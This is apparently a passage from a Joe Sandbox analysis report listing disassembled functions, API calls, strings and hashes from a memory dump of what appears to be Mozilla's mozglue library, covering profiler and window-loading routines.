Instruction Fuzzy Hash: 37C1D375D022098BDB14CF55C5906EEBBF2FF8A318F28415DD8566BB44D732A806CFA4

Function 6C670512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: 7096cd88ce8bbf4e2a1dc976ee205ef9b0bf7cc9c4b19d9876b31d452b0a7308
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: 45223971E04619CFCB24CF98C890AADF7B2FF89308F548599D44AA7705D731A986CFA4

Function 6C6BAC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d5bd74635ca3708f5d2e103ff0b06b176deca7b0ccd5f70f413e03fd511940
Instruction ID: 85855c6beddebca8515a0b0ad7606806b5eb821d9b8c56be951dda5deb25fcd9
Opcode Fuzzy Hash: e8d5bd74635ca3708f5d2e103ff0b06b176deca7b0ccd5f70f413e03fd511940
Instruction Fuzzy Hash: 3CF17B716087455FD700CE28C8903AEB7E6AFC6318F148A2DE5D4A7782E374D899C796

Function 6C64C670 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction ID: 4a56f360fc81334f54d0db3bf708a7fe012ac1b987c043d2ef7292affbe353e0
Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction Fuzzy Hash: D9A1A171F0061A9FDB08CE69C8913AEB7F2AFC9354F18C129D916E7781D7345C0A8B94

Function 6C6A55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C67E1A5), ref: 6C6A5606
LoadLibraryW.KERNEL32(gdi32,?,6C67E1A5), ref: 6C6A560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C6A5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C6A563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C6A566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C6A567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C6A5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6A56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6A56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6A56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6A56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C6A5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C6A572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C6A5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C6A5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C6A577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C6A5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6A57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6A57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6A57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6A57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6A57FF

Strings

ReleaseDC, xrefs: 6C6A5742
GetThreadDpiAwarenessContext, xrefs: 6C6A562D
ShowWindow, xrefs: 6C6A56DE
LoadCursorW, xrefs: 6C6A5774
MonitorFromWindow, xrefs: 6C6A578D
RegisterClassW, xrefs: 6C6A56AC
SetWindowLongPtrW, xrefs: 6C6A57B7
user32, xrefs: 6C6A5601
EnableNonClientDpiScaling, xrefs: 6C6A5666
CreateSolidBrush, xrefs: 6C6A57E4
SetWindowPos, xrefs: 6C6A56F7
FillRect, xrefs: 6C6A5729
GetDpiForWindow, xrefs: 6C6A5690
CreateWindowExW, xrefs: 6C6A56C5
LoadIconW, xrefs: 6C6A575B
StretchDIBits, xrefs: 6C6A57CC
DeleteObject, xrefs: 6C6A57F9
GetWindowDC, xrefs: 6C6A5710
gdi32, xrefs: 6C6A560A
GetMonitorInfoW, xrefs: 6C6A57A2
AreDpiAwarenessContextsEqual, xrefs: 6C6A5637
GetSystemMetricsForDpi, xrefs: 6C6A5677

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: beca4668038f4c8de9bcc85b32bceb96f8a55f9e6ac1abbb7b42d77df4e303f3
Instruction ID: 629fb92bf2db63756211b62c32e41445cd06480e0715d013aea9499b2da5e203
Opcode Fuzzy Hash: beca4668038f4c8de9bcc85b32bceb96f8a55f9e6ac1abbb7b42d77df4e303f3
Instruction Fuzzy Hash: DB5187747117166BDB04DF768D8492A3AF8BB4A785F104425AA21E3A11EF74CE028F7E

Function 6C68CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C65582D), ref: 6C68CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C65582D), ref: 6C68CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6BFE98,?,?,?,?,?,6C65582D), ref: 6C68CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C65582D), ref: 6C68CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C65582D), ref: 6C68CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C65582D), ref: 6C68CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C65582D), ref: 6C68CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C68CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C68CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C68CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C68CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C68CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C68CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C68CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C68CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C68CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C68CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C68CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C68CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C68CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C68CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C68CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C68CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C68CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C68CE8A

Strings

cpuallthreads, xrefs: 6C68CE16
seqstyle, xrefs: 6C68CCE6
screenshots, xrefs: 6C68CCD4
default, xrefs: 6C68CC21
Unrecognized feature "%s"., xrefs: 6C68CEA0
fileioall, xrefs: 6C68CCA8
nativeallocations, xrefs: 6C68CDA8
processcpu, xrefs: 6C68CE6E
audiocallbacktracing, xrefs: 6C68CDD4
leaf, xrefs: 6C68CC66
preferencereads, xrefs: 6C68CD92
jsallocations, xrefs: 6C68CD0E
samplingallthreads, xrefs: 6C68CE2C
noiostacks, xrefs: 6C68CCBE
mainthreadio, xrefs: 6C68CC7C
fileio, xrefs: 6C68CC92
power, xrefs: 6C68CE84
ipcmessages, xrefs: 6C68CDBE
java, xrefs: 6C68CC37
unregisteredthreads, xrefs: 6C68CE58
nostacksampling, xrefs: 6C68CD7C
markersallthreads, xrefs: 6C68CE42
stackwalk, xrefs: 6C68CCF8
notimerresolutionchange, xrefs: 6C68CE00

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: d9d70fcd4275afe6ac223d45014a32c49d984151afa144588c643e7df3c42a35
Instruction ID: 9614f167f2b61bac3cf0e47d4ed01c3928c8e4b069b1205ac0b20d2eadd51851
Opcode Fuzzy Hash: d9d70fcd4275afe6ac223d45014a32c49d984151afa144588c643e7df3c42a35
Instruction Fuzzy Hash: 18519BC5A4722571FA1031156D20BEA1489EF5734AF508536EE07B1E80FB15B72AC7BF

Function 6C654470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C654730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6544B2,6C6CE21C,6C6CF7F8), ref: 6C65473E
Part of subcall function 6C654730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C65474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6544BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6544D2
InitOnceExecuteOnce.KERNEL32(6C6CF80C,6C64F240,?,?), ref: 6C65451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C65455C
LoadLibraryW.KERNEL32(?), ref: 6C654592
InitializeCriticalSection.KERNEL32(6C6CF770), ref: 6C6545A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C6545AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C6545BB
InitOnceExecuteOnce.KERNEL32(6C6CF818,6C64F240,?,?), ref: 6C654612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C654636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C654644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C65466D
VerSetConditionMask.NTDLL ref: 6C65469F
VerSetConditionMask.NTDLL ref: 6C6546AB
VerSetConditionMask.NTDLL ref: 6C6546B2
VerSetConditionMask.NTDLL ref: 6C6546B9
VerSetConditionMask.NTDLL ref: 6C6546C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6546CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C6546F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6546FD

Strings

NativeNtBlockSet_Write, xrefs: 6C6546F7
Gll, xrefs: 6C6544FC
kernel32.dll, xrefs: 6C6544CD
user32.dll, xrefs: 6C654557, 6C65463F
l, xrefs: 6C654578
WRusr.dll, xrefs: 6C6544B5

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gll$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-1232532251
Opcode ID: 692987472a9262210407bf68c543997b195584303b6f3f43eefd68d7a19882a6
Instruction ID: 8d4995c7679d54c4a4c0a1e39305751b23367547171ec54bff7fb83cf7ae722b
Opcode Fuzzy Hash: 692987472a9262210407bf68c543997b195584303b6f3f43eefd68d7a19882a6
Instruction Fuzzy Hash: AE6118B0704344AFEB008F62CC85BA57BB8EF46748F548499E5049B641D7F18A75CFAE

Function 6C68F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C654A68), ref: 6C68945E
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C689470
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C689482
Part of subcall function 6C689420: __Init_thread_footer.LIBCMT ref: 6C68949F

GetCurrentThreadId.KERNEL32 ref: 6C68F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C68F8F9

Part of subcall function 6C656390: GetCurrentThreadId.KERNEL32 ref: 6C6563D0
Part of subcall function 6C656390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6563DF
Part of subcall function 6C656390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C65640E

ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68F93A
GetCurrentThreadId.KERNEL32 ref: 6C68F98A
GetCurrentThreadId.KERNEL32 ref: 6C68F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C68F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C68F716

Part of subcall function 6C6894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6894EE
Part of subcall function 6C6894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C689508

Part of subcall function 6C64B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C64B5E0

GetCurrentThreadId.KERNEL32 ref: 6C68F739
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68F746
GetCurrentThreadId.KERNEL32 ref: 6C68F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6C385B,00000002,?,?,?,?,?), ref: 6C68F829
free.MOZGLUE(?,?,00000000,?), ref: 6C68F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C68F866
free.MOZGLUE(?), ref: 6C68FA0C

Part of subcall function 6C655E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6555E1), ref: 6C655E8C
Part of subcall function 6C655E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C655E9D
Part of subcall function 6C655E60: GetCurrentThreadId.KERNEL32 ref: 6C655EAB
Part of subcall function 6C655E60: GetCurrentThreadId.KERNEL32 ref: 6C655EB8
Part of subcall function 6C655E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C655ECF
Part of subcall function 6C655E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C655F27
Part of subcall function 6C655E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C655F47
Part of subcall function 6C655E60: GetCurrentProcess.KERNEL32 ref: 6C655F53
Part of subcall function 6C655E60: GetCurrentThread.KERNEL32 ref: 6C655F5C
Part of subcall function 6C655E60: GetCurrentProcess.KERNEL32 ref: 6C655F66
Part of subcall function 6C655E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C655F7E

free.MOZGLUE(?), ref: 6C68F9C5
free.MOZGLUE(?), ref: 6C68F9DA

Strings

" attempted to re-register as ", xrefs: 6C68F858
Thread , xrefs: 6C68F789
[D %d/%d] profiler_register_thread(%s), xrefs: 6C68F71F
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C68F9A6

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: b19887d64419bcdb20f3f1d0acc7142ca166cfbf07e0fd9f70d10e8e5c13fba8
Instruction ID: 2301245335364981b0b67fc26f99c7e00bed8bf53410c8d0585649b0e096f0c1
Opcode Fuzzy Hash: b19887d64419bcdb20f3f1d0acc7142ca166cfbf07e0fd9f70d10e8e5c13fba8
Instruction Fuzzy Hash: D08116716056009FDB10DF25C880AAEB7B5EFCA308F54852DE84597B52EB30D949CBAF

Function 6C68EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C654A68), ref: 6C68945E
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C689470
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C689482
Part of subcall function 6C689420: __Init_thread_footer.LIBCMT ref: 6C68949F

GetCurrentThreadId.KERNEL32 ref: 6C68EE60
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68EE6D
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C68EEA5
CloseHandle.KERNEL32(?), ref: 6C68EEB4
free.MOZGLUE(00000000), ref: 6C68EEBB
GetCurrentThreadId.KERNEL32 ref: 6C68EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C68EECF

Part of subcall function 6C68DE60: GetCurrentThreadId.KERNEL32 ref: 6C68DE73
Part of subcall function 6C68DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C654A68), ref: 6C68DE7B
Part of subcall function 6C68DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C654A68), ref: 6C68DEB8
Part of subcall function 6C68DE60: free.MOZGLUE(00000000,?,6C654A68), ref: 6C68DEFE
Part of subcall function 6C68DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C68DF38

Part of subcall function 6C67CBE8: GetCurrentProcess.KERNEL32(?,6C6431A7), ref: 6C67CBF1
Part of subcall function 6C67CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6431A7), ref: 6C67CBFA

GetCurrentThreadId.KERNEL32 ref: 6C68EF1E
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68EF2B
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68EF59
GetCurrentThreadId.KERNEL32 ref: 6C68EFB0
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68EFBD
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68EFE1
GetCurrentThreadId.KERNEL32 ref: 6C68EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C68F000

Part of subcall function 6C6894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6894EE
Part of subcall function 6C6894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C689508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C68F02F

Part of subcall function 6C68F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C68F09B
Part of subcall function 6C68F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C68F0AC
Part of subcall function 6C68F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C68F0BE

Strings

[I %d/%d] profiler_stop, xrefs: 6C68EED7
[I %d/%d] profiler_pause, xrefs: 6C68F008

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 71dd8be50467f71185ad76fdf2842611f9a4b6cfa43a0ed3c12f4567cf6add30
Instruction ID: 067141b59f2c666b7495d9340218b33de267f06116d1bec402fd20f7b956fc48
Opcode Fuzzy Hash: 71dd8be50467f71185ad76fdf2842611f9a4b6cfa43a0ed3c12f4567cf6add30
Instruction Fuzzy Hash: FB5106357022109FDB005B66D4887997BB4EF8B35DF104566E91583B42DB784A05CBFF

Function 6C655E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C655E9D

Part of subcall function 6C665B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6656EE,?,00000001), ref: 6C665B85
Part of subcall function 6C665B50: EnterCriticalSection.KERNEL32(6C6CF688,?,?,?,6C6656EE,?,00000001), ref: 6C665B90
Part of subcall function 6C665B50: LeaveCriticalSection.KERNEL32(6C6CF688,?,?,?,6C6656EE,?,00000001), ref: 6C665BD8
Part of subcall function 6C665B50: GetTickCount64.KERNEL32 ref: 6C665BE4

GetCurrentThreadId.KERNEL32 ref: 6C655EAB
GetCurrentThreadId.KERNEL32 ref: 6C655EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C655ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C656017

Part of subcall function 6C644310: moz_xmalloc.MOZGLUE(00000010,?,6C6442D2), ref: 6C64436A
Part of subcall function 6C644310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6442D2), ref: 6C644387

moz_xmalloc.MOZGLUE(00000004), ref: 6C655F47
GetCurrentProcess.KERNEL32 ref: 6C655F53
GetCurrentThread.KERNEL32 ref: 6C655F5C
